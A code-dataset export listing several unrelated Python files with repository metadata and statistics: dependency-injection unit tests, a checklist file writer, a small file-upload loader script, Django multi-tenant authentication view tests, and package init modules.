| 56.229167 | 119 | 0.728541 | 1,618 | 16,194 | 6.942522 | 0.088381 | 0.222202 | 0.09846 | 0.159708 | 0.825692 | 0.825692 | 0.825692 | 0.825692 | 0.753138 | 0.72839 | 0 | 0.002388 | 0.172657 | 16,194 | 287 | 120 | 56.425087 | 0.83602 | 0.002841 | 0 | 0.410072 | 1 | 0 | 0.280379 | 0.245262 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003597 | false | 0 | 0.003597 | 0.003597 | 0.021583 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3a20f5bede99102dfe45f3419ad76e40aa3d02b5 | 4,316 | py | Python | tests/test_inject.py | sturmianseq/pythondi | bfb538540f3119d79e68e07572bc6e2f9573d3bc | [
"Apache-2.0"
] | 34 | 2019-11-12T08:45:16.000Z | 2022-02-05T19:11:08.000Z | tests/test_inject.py | sturmianseq/pythondi | bfb538540f3119d79e68e07572bc6e2f9573d3bc | [
"Apache-2.0"
] | 2 | 2021-08-23T09:23:57.000Z | 2021-12-13T04:41:24.000Z | tests/test_inject.py | sturmianseq/pythondi | bfb538540f3119d79e68e07572bc6e2f9573d3bc | [
"Apache-2.0"
] | 3 | 2020-09-22T16:10:35.000Z | 2021-08-24T01:19:53.000Z | import pytest
from pythondi import inject, Provider, configure_after_clear
class Repo:
def __init__(self):
pass
class SQLRepo:
def __init__(self):
pass
class Usecase:
def __init__(self):
pass
class UserUsecase:
def __init__(self):
pass
def test_sync_inject_without_parameter():
provider = Provider()
provider.bind(Repo, SQLRepo)
configure_after_clear(provider)
@inject()
def func(repo: Repo):
assert isinstance(repo, SQLRepo)
func()
def test_sync_inject_without_parameter_multiple_bind():
provider = Provider()
provider.bind(Repo, SQLRepo)
provider.bind(Usecase, UserUsecase)
configure_after_clear(provider)
@inject()
def func(repo: Repo, usecase: Usecase):
assert isinstance(repo, SQLRepo)
assert isinstance(usecase, UserUsecase)
func()
def test_sync_inject_with_classes_argument():
provider = Provider()
provider.bind(classes={Repo: SQLRepo})
configure_after_clear(provider)
@inject()
def func(repo: Repo):
assert isinstance(repo, SQLRepo)
func()
def test_sync_inject_with_classes_argument_multiple_bind():
provider = Provider()
provider.bind(classes={Repo: SQLRepo, Usecase: UserUsecase})
configure_after_clear(provider)
@inject()
def func(repo: Repo, usecase: Usecase):
assert isinstance(repo, SQLRepo)
assert isinstance(usecase, UserUsecase)
func()
def test_sync_inject_with_parameter():
provider = Provider()
provider.bind(Repo, SQLRepo)
configure_after_clear(provider)
@inject(repo=SQLRepo)
def func(repo):
assert isinstance(repo, SQLRepo)
func()
def test_sync_inject_with_parameter_multiple_bind():
provider = Provider()
configure_after_clear(provider)
@inject(repo=SQLRepo, usecase=UserUsecase)
def func(repo, usecase):
assert isinstance(repo, SQLRepo)
assert isinstance(usecase, UserUsecase)
func()
@pytest.mark.asyncio
async def test_async_inject_without_parameter():
provider = Provider()
provider.bind(Repo, SQLRepo)
configure_after_clear(provider)
@inject()
async def func(repo: Repo):
assert isinstance(repo, SQLRepo)
await func()
@pytest.mark.asyncio
async def test_async_inject_without_parameter_multiple_bind():
provider = Provider()
provider.bind(Repo, SQLRepo)
provider.bind(Usecase, UserUsecase)
configure_after_clear(provider)
@inject()
async def func(repo: Repo, usecase: Usecase):
assert isinstance(repo, SQLRepo)
assert isinstance(usecase, UserUsecase)
await func()
@pytest.mark.asyncio
async def test_async_inject_with_classes_argument():
provider = Provider()
provider.bind(classes={Repo: SQLRepo})
configure_after_clear(provider)
@inject()
async def func(repo: Repo):
assert isinstance(repo, SQLRepo)
await func()
@pytest.mark.asyncio
async def test_async_inject_with_classes_argument_multiple_bind():
provider = Provider()
provider.bind(classes={Repo: SQLRepo, Usecase: UserUsecase})
configure_after_clear(provider)
@inject()
async def func(repo: Repo, usecase: Usecase):
assert isinstance(repo, SQLRepo)
assert isinstance(usecase, UserUsecase)
await func()
@pytest.mark.asyncio
async def test_async_inject_with_parameter():
provider = Provider()
provider.bind(Repo, SQLRepo)
configure_after_clear(provider)
@inject(repo=SQLRepo)
async def func(repo):
assert isinstance(repo, SQLRepo)
await func()
@pytest.mark.asyncio
async def test_async_inject_with_parameter_multiple_bind():
provider = Provider()
configure_after_clear(provider)
@inject(repo=SQLRepo, usecase=UserUsecase)
async def func(repo, usecase):
assert isinstance(repo, SQLRepo)
assert isinstance(usecase, UserUsecase)
await func()
@pytest.mark.asyncio
async def test_manual_provide_args_outside():
provider = Provider()
provider.bind(classes={Repo: SQLRepo})
configure_after_clear(provider)
class MockRepo:
pass
@inject()
async def func(repo: Repo):
return repo
result = await func(repo=MockRepo())
assert isinstance(result, MockRepo)
| 21.908629 | 66 | 0.699259 | 489 | 4,316 | 5.94274 | 0.083845 | 0.102202 | 0.091535 | 0.120785 | 0.920853 | 0.900206 | 0.887474 | 0.882657 | 0.882657 | 0.882657 | 0 | 0 | 0.206441 | 4,316 | 196 | 67 | 22.020408 | 0.848467 | 0 | 0 | 0.798507 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141791 | 1 | 0.119403 | false | 0.037313 | 0.014925 | 0 | 0.179104 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3a520c8cea77188b7ce3af4c29c8b4016936a4de | 1,287 | py | Python | file_handler.py | jacobhq/piprint.py | fc978d220eea32e8b1acfe99e19174e05369eb34 | [
"BSD-3-Clause"
] | 1 | 2021-03-22T08:39:12.000Z | 2021-03-22T08:39:12.000Z | file_handler.py | jacobhq/piprint.py | fc978d220eea32e8b1acfe99e19174e05369eb34 | [
"BSD-3-Clause"
] | 1 | 2021-01-02T10:22:24.000Z | 2021-03-22T07:35:23.000Z | file_handler.py | jacobhq/piprint.py | fc978d220eea32e8b1acfe99e19174e05369eb34 | [
"BSD-3-Clause"
] | null | null | null | from datetime import date
# Get date
date = date.today()
date_str = str(date)
# Handler syntax
def new(fileName, item, titleText):
with open(fileName,'w',encoding = 'utf-8') as f:
f.write(titleText + "\n")
f.write("------------------\n")
f.write("Item\n")
f.write("------------------\n")
f.write(item + " ☐\n")
f.write("------------------\n")
f.write("Printed " + date_str)
f.close()
def new2(fileName, item, titleText):
with open(fileName,'w',encoding = 'utf-8') as f:
f.write(titleText + "\n")
f.write("------------------\n")
f.write("Item\n")
f.write("------------------\n")
f.write(item[0] + " ☐\n")
f.write(item[1] + " ☐\n")
f.write("------------------\n")
f.write("Printed " + date_str)
f.close()
def new3(fileName, item, titleText):
with open(fileName,'w',encoding = 'utf-8') as f:
f.write(titleText + "\n")
f.write("------------------\n")
f.write("Item\n")
f.write("------------------\n")
f.write(item[0] + " ☐\n")
f.write(item[1] + " ☐\n")
f.write(item[2] + " ☐\n")
f.write("------------------\n")
f.write("Printed " + date_str)
f.close()
| 29.25 | 52 | 0.423465 | 164 | 1,287 | 3.335366 | 0.195122 | 0.263254 | 0.268739 | 0.131627 | 0.846435 | 0.839122 | 0.839122 | 0.839122 | 0.839122 | 0.839122 | 0 | 0.010616 | 0.268065 | 1,287 | 43 | 53 | 29.930233 | 0.563694 | 0.017871 | 0 | 0.777778 | 0 | 0 | 0.218874 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.027778 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
28e004a889137fdc9a12779c321139f6d53971d3 | 560 | py | Python | loader.py | leftshift/angelshifts | f73a36cd38a6de7ee8a26d13c712a0aa19380f63 | [
"MIT"
] | null | null | null | loader.py | leftshift/angelshifts | f73a36cd38a6de7ee8a26d13c712a0aa19380f63 | [
"MIT"
] | null | null | null | loader.py | leftshift/angelshifts | f73a36cd38a6de7ee8a26d13c712a0aa19380f63 | [
"MIT"
] | null | null | null | exec("l = []\nwhile True:\n\ti = input()\n\tif i.strip() == '***':\n\t\tbreak\n\telse:\n\t\tl.append(i)\nwith open('/lib/angelshifts/__init__.py', 'w') as f:\n\tf.write('\\n'.join(l))")
exec("l = []\nwhile True:\n\ti = input()\n\tif i.strip() == '***':\n\t\tbreak\n\telse:\n\t\tl.append(i)\nwith open('/lib/angelshifts/service.py', 'w') as f:\n\tf.write('\\n'.join(l))")
exec("l = []\nwhile True:\n\ti = input()\n\tif i.strip() == '***':\n\t\tbreak\n\telse:\n\t\tl.append(i)\nwith open('/lib/angelshifts/service.json', 'w') as f:\n\tf.write('\\n'.join(l))")
| 93.333333 | 186 | 0.583929 | 108 | 560 | 2.990741 | 0.268519 | 0.037152 | 0.102167 | 0.139319 | 0.975232 | 0.975232 | 0.975232 | 0.975232 | 0.975232 | 0.919505 | 0 | 0 | 0.073214 | 560 | 5 | 187 | 112 | 0.622351 | 0 | 0 | 0 | 0 | 1 | 0.948214 | 0.605357 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
e915b0a2c76fcf07b2f6060715d24479c2aafbaa | 13,372 | py | Python | foundation_auth/tests/test_views.py | smegurus/smegurus-django | 053973b5ff0b997c52bfaca8daf8e07db64a877c | [
"BSD-4-Clause"
] | 1 | 2020-07-16T10:58:23.000Z | 2020-07-16T10:58:23.000Z | foundation_auth/tests/test_views.py | smegurus/smegurus-django | 053973b5ff0b997c52bfaca8daf8e07db64a877c | [
"BSD-4-Clause"
] | 13 | 2018-11-30T02:29:39.000Z | 2022-03-11T23:35:49.000Z | foundation_auth/tests/test_views.py | smegurus/smegurus-django | 053973b5ff0b997c52bfaca8daf8e07db64a877c | [
"BSD-4-Clause"
] | null | null | null | from django.core.signing import Signer
from django.db import transaction
from django.contrib.auth.models import User, Group
from django.utils import translation
from django.core.urlresolvers import resolve, reverse
from rest_framework.authtoken.models import Token
from rest_framework.test import APITestCase
from rest_framework import status
from django_tenants.test.cases import TenantTestCase
from django_tenants.test.client import TenantClient
from foundation_public.models.organization import PublicOrganization
from foundation_tenant.models.base.me import Me
from foundation_tenant.models.base.postaladdress import PostalAddress
from foundation_tenant.models.base.contactpoint import ContactPoint
from smegurus import constants
TEST_USER_EMAIL = "ledo@gah.com"
TEST_USER_USERNAME = "ledo"
TEST_USER_PASSWORD = "GalacticAllianceOfHumankind"
class FoundationAuthViewsWithPublicSchemaTestCases(APITestCase, TenantTestCase):
fixtures = []
def setup_tenant(self, tenant):
"""Public Schema"""
tenant.schema_name = 'test' # Do not change.
tenant.name = "Galactic Alliance of Humankind"
tenant.has_perks=True
tenant.has_mentors=True
tenant.how_discovered = "Command HQ"
tenant.how_many_served = 1
@classmethod
def setUpTestData(cls):
Group.objects.bulk_create([
Group(id=constants.ENTREPRENEUR_GROUP_ID, name="Entreprenuer",),
Group(id=constants.MENTOR_GROUP_ID, name="Mentor",),
Group(id=constants.ADVISOR_GROUP_ID, name="Advisor",),
Group(id=constants.ORGANIZATION_MANAGER_GROUP_ID, name="Org Manager",),
Group(id=constants.ORGANIZATION_ADMIN_GROUP_ID, name="Org Admin",),
Group(id=constants.CLIENT_MANAGER_GROUP_ID, name="Client Manager",),
Group(id=constants.SYSTEM_ADMIN_GROUP_ID, name="System Admin",),
])
user = User.objects.create_user( # Create our User.
email=TEST_USER_EMAIL,
username=TEST_USER_USERNAME,
password=TEST_USER_PASSWORD
)
user.is_active = True
user.save()
# Setup Profiles
# me = Me.objects.get(owner=user)
# me.is_in_intake=True
# me.save()
@transaction.atomic
def setUp(self):
translation.activate('en') # Set English
super(FoundationAuthViewsWithPublicSchemaTestCases, self).setUp()
# Initialize our test data.
self.user = User.objects.get()
token = Token.objects.get(user__username=TEST_USER_USERNAME)
# Setup.
self.unauthorized_client = TenantClient(self.tenant)
self.authorized_client = TenantClient(self.tenant, HTTP_AUTHORIZATION='Token ' + token.key)
self.authorized_client.login(
username=TEST_USER_USERNAME,
password=TEST_USER_PASSWORD
)
@transaction.atomic
def tearDown(self):
PostalAddress.objects.delete_all()
ContactPoint.objects.delete_all()
Me.objects.delete_all()
items = User.objects.all()
for item in items.all():
item.delete()
items = Group.objects.all()
for item in items.all():
item.delete()
# super(FoundationAuthViewsWithPublicSchemaTestCases, self).tearDown()
@transaction.atomic
def test_user_registration_page_view(self):
url = reverse('foundation_auth_user_registration')
response = self.unauthorized_client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(len(response.content) > 1)
self.assertIn(b'ajax_new_user',response.content)
@transaction.atomic
def test_user_activation_required_page_view(self):
response = self.unauthorized_client.get(reverse('foundation_auth_user_activation_required'))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(len(response.content) > 1)
@transaction.atomic
def test_user_activate_page_view_with_success_for_entreprenuer(self):
"""
Unit test will take a User account which hasen't been activated and
run the URL where activation happens and verify the User has been
activated.
"""
# Convert our User's ID into an encrypted value.
user = User.objects.get(email=TEST_USER_EMAIL)
entrepreneur_group = Group.objects.get(id=constants.ENTREPRENEUR_GROUP_ID)
user.is_activet = False
user.groups.add(entrepreneur_group)
user.save()
signer = Signer()
id_sting = str(user.id).encode()
value = signer.sign(id_sting)
self.tenant.users.add(user)
self.tenant.save()
# Run test.
url = reverse('foundation_auth_user_activation', args=[value])
response = self.unauthorized_client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(len(response.content) > 1)
# Verify.
user = User.objects.get(email=TEST_USER_EMAIL)
self.assertTrue(user.is_active)
@transaction.atomic
def test_user_activate_page_view_with_success_for_org_admin(self):
"""
Unit test will take a User account which hasen't been activated and
run the URL where activation happens and verify the User has been
activated.
"""
# Convert our User's ID into an encrypted value.
user = User.objects.get(email=TEST_USER_EMAIL)
org_admin_group = Group.objects.get(id=constants.ORGANIZATION_ADMIN_GROUP_ID)
user.is_activet = False
user.groups.add(org_admin_group)
user.save()
signer = Signer()
id_sting = str(user.id).encode()
value = signer.sign(id_sting)
self.tenant.users.add(user)
self.tenant.save()
# Run test.
url = reverse('foundation_auth_user_activation', args=[value])
response = self.unauthorized_client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(len(response.content) > 1)
# Verify.
user = User.objects.get(email=TEST_USER_EMAIL)
self.assertTrue(user.is_active)
@transaction.atomic
def test_user_activate_page_view_with_failed_signiture(self):
# Run test & verify.
response = self.unauthorized_client.get(reverse('foundation_auth_user_activation', args=[666] ))
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(len(response.content) > 1)
self.assertIn(b'Failed activating this account.', response.content)
@transaction.atomic
def test_user_activate_page_view_with_missing_user(self):
# Pre-configure unit test: Delete previous users.
items = User.objects.all()
for item in items.all():
item.delete()
# Generate a string value.
signer = Signer()
id_sting = str(666).encode()
value = signer.sign(id_sting)
# Run test & verify.
url = reverse('foundation_auth_user_activation', args=[value])
response = self.authorized_client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(len(response.content) > 1)
self.assertIn(b'The page you are looking for does not exists.', response.content)
@transaction.atomic
def test_user_login_page_view(self):
response = self.unauthorized_client.get(reverse('foundation_auth_user_login'))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(len(response.content) > 1)
@transaction.atomic
def test_org_reg_page_view(self):
response = self.authorized_client.get(reverse('foundation_auth_org_registration'))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(len(response.content) > 1)
@transaction.atomic
def test_org_successful_registration_view(self):
# Assign User to Organization.
self.tenant.users.add(self.user)
self.tenant.owner = self.user
self.tenant.save()
# Run the test and verify.
response = self.authorized_client.get(reverse('foundation_auth_org_successful_registration'))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(len(response.content) > 1)
self.assertIn(b'Successful Registration',response.content)
@transaction.atomic
def test_user_launchpad_page_view_with_unauthorized(self):
response = self.unauthorized_client.get(reverse('foundation_auth_user_launchpad'))
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
self.assertRedirects(response, '/en/login?next=/en/launchpad')
@transaction.atomic
def test_user_launchpad_page_view_with_redirect_to_org_reg(self):
response = self.authorized_client.get(reverse('foundation_auth_user_launchpad'))
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
self.assertRedirects(response, '/en/register/organization')
@transaction.atomic
def test_user_password_reset_page_view(self):
url = reverse('foundation_auth_password_reset')
response = self.unauthorized_client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(len(response.content) > 1)
self.assertIn(b'ajax_password_reset',response.content)
@transaction.atomic
def test_user_password_reset_sent_page_view(self):
url = reverse('foundation_auth_password_reset_sent')
response = self.unauthorized_client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(len(response.content) > 1)
self.assertIn(b'ajax_login',response.content)
@transaction.atomic
def test_user_password_change_page_view(self):
# Convert our User's ID into an encrypted value.
user = User.objects.get(email=TEST_USER_EMAIL)
signer = Signer()
id_sting = str(user.id).encode()
value = signer.sign(id_sting)
# Run test.
url = reverse('foundation_auth_password_reset_and_change', args=[value])
response = self.unauthorized_client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(len(response.content) > 1)
self.assertIn(b'ajax_login',response.content)
class FoundationAuthViewsWithTenatSchemaTestCases(APITestCase, TenantTestCase):
fixtures = []
def setup_tenant(self, tenant):
"""Tenant Schema"""
tenant.schema_name = 'galacticalliance'
tenant.name = "Galactic Alliance of Humankind"
tenant.has_perks=True
tenant.has_mentors=True
tenant.how_discovered = "Command HQ"
tenant.how_many_served = 1
@classmethod
def setUpTestData(cls):
Group.objects.bulk_create([
Group(id=constants.ENTREPRENEUR_GROUP_ID, name="Entreprenuer",),
Group(id=constants.MENTOR_GROUP_ID, name="Mentor",),
Group(id=constants.ADVISOR_GROUP_ID, name="Advisor",),
Group(id=constants.ORGANIZATION_MANAGER_GROUP_ID, name="Org Manager",),
Group(id=constants.ORGANIZATION_ADMIN_GROUP_ID, name="Org Admin",),
Group(id=constants.CLIENT_MANAGER_GROUP_ID, name="Client Manager",),
Group(id=constants.SYSTEM_ADMIN_GROUP_ID, name="System Admin",),
])
user = User.objects.create_user( # Create our User.
email=TEST_USER_EMAIL,
username=TEST_USER_USERNAME,
password=TEST_USER_PASSWORD
)
user.is_active = True
user.save()
# Setup Profiles
# me = Me.objects.get(owner=user)
# me.is_in_intake=True
# me.save()
@transaction.atomic
def setUp(self):
translation.activate('en') # Set English
super(FoundationAuthViewsWithTenatSchemaTestCases, self).setUp()
# Initialize our test data.
self.user = User.objects.get()
token = Token.objects.get(user__username=TEST_USER_USERNAME)
# Setup.
self.unauthorized_client = TenantClient(self.tenant)
self.authorized_client = TenantClient(self.tenant, HTTP_AUTHORIZATION='Token ' + token.key)
self.authorized_client.login(
username=TEST_USER_USERNAME,
password=TEST_USER_PASSWORD
)
# Update Organization.
self.tenant.users.add(self.user)
self.tenant.save()
@transaction.atomic
def tearDown(self):
PostalAddress.objects.delete_all()
ContactPoint.objects.delete_all()
Me.objects.delete_all()
items = User.objects.all()
for item in items.all():
item.delete()
items = Group.objects.all()
for item in items.all():
item.delete()
# super(FoundationAuthViewsWithTenatSchemaTestCases, self).tearDown()
@transaction.atomic
def test_user_launchpad_page_view_with_redirect_to_dashboard(self):
url = reverse('foundation_auth_user_launchpad')
response = self.authorized_client.get(url)
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
self.assertRedirects(response, 'http://galacticalliance.example.com/en/dashboard')
| 39.916418 | 104 | 0.687107 | 1,580 | 13,372 | 5.588608 | 0.131013 | 0.029898 | 0.043035 | 0.04077 | 0.82231 | 0.803058 | 0.785391 | 0.752208 | 0.724689 | 0.662061 | 0 | 0.006214 | 0.217694 | 13,372 | 334 | 105 | 40.035928 | 0.837874 | 0.083981 | 0 | 0.716599 | 0 | 0 | 0.086336 | 0.047332 | 0 | 0 | 0 | 0 | 0.157895 | 1 | 0.093117 | false | 0.048583 | 0.060729 | 0 | 0.17004 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3a6b126445de1a4083f143724aa78aba3b55e1cd | 215 | py | Python | mipqctool/model/mapping/__init__.py | aueb-wim/HBPMedical-QCtool | f2cb7a23a9a1980b2797e37407e2dc5d4c236c5d | [
"Apache-2.0"
] | 8 | 2019-09-24T17:00:54.000Z | 2021-11-13T22:13:30.000Z | mipqctool/model/mapping/__init__.py | aueb-wim/HBPMedical-QCtool | f2cb7a23a9a1980b2797e37407e2dc5d4c236c5d | [
"Apache-2.0"
] | 5 | 2020-12-02T13:51:47.000Z | 2022-01-09T17:30:57.000Z | mipqctool/model/mapping/__init__.py | aueb-wim/DataQualityControlTool | 54d29aee2b54e61e94c5f2483961bf95e6977d90 | [
"Apache-2.0"
] | 2 | 2021-09-08T12:13:01.000Z | 2021-10-06T12:12:37.000Z | from mipqctool.model.mapping.correspondence import Correspondence
from mipqctool.model.mapping.mapping import Mapping
from mipqctool.model.mapping.csvdb import CsvDB
from mipqctool.model.mapping.datadb import DataDB | 53.75 | 65 | 0.874419 | 28 | 215 | 6.714286 | 0.285714 | 0.276596 | 0.382979 | 0.531915 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 215 | 4 | 66 | 53.75 | 0.94 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
3a7be399c27231c8a825b0ffc9ec68715f82775a | 62 | py | Python | utils/__init__.py | RyodoTanaka/Eigen3ToPython | 6bb9e44be553e996541b019c1d5aefcdbdfcb482 | [
"BSD-2-Clause"
] | 40 | 2017-04-19T11:54:42.000Z | 2022-03-10T01:55:45.000Z | utils/__init__.py | RyodoTanaka/Eigen3ToPython | 6bb9e44be553e996541b019c1d5aefcdbdfcb482 | [
"BSD-2-Clause"
] | 20 | 2017-01-11T03:11:19.000Z | 2021-04-26T04:10:13.000Z | utils/__init__.py | RyodoTanaka/Eigen3ToPython | 6bb9e44be553e996541b019c1d5aefcdbdfcb482 | [
"BSD-2-Clause"
] | 6 | 2017-06-24T18:52:53.000Z | 2022-01-19T23:48:32.000Z | import os
from .generate_eigen_pyx import generate_eigen_pyx
| 15.5 | 50 | 0.870968 | 10 | 62 | 5 | 0.6 | 0.52 | 0.64 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112903 | 62 | 3 | 51 | 20.666667 | 0.909091 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.